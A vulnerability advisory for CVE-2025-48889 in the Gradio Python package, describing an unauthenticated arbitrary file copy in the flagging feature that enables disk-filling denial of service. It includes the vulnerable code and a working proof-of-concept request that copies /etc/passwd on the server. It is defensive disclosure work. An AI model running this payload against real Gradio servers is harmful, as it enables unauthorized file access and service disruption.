logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-48889 gradio

Package

Manager: pip
Name: gradio
Vulnerable Version: >=0 <5.31.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

EPSS: 0.00254 pctl0.48574

Details

Gradio Allows Unauthorized File Copy via Path Manipulation An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. ### Description The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the `/gradio_api/run/predict` endpoint to trigger these file copies. **Source**: User-controlled `path` parameter in the flagging functionality JSON payload **Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method The vulnerable code flow: 1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint 2. The `path` field within `FileData` object can reference any file on the system 3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object 4. The `FileData._copy_to_dir()` method uses this path without proper validation: ```python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj) ``` 5. The lack of validation allows copying any file the Gradio process can read ### PoC The following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio's flagged directory: Setup a Gradio app: ```python import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True) ``` Run the PoC: ```python import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ```

Metadata

Created: 2025-05-29T22:36:59Z
Modified: 2025-05-30T15:18:21Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-8jw3-6x8j-v96g/GHSA-8jw3-6x8j-v96g.json
CWE IDs: ["CWE-434"]
Alternative ID: GHSA-8jw3-6x8j-v96g
Finding: F027
Auto approve: 1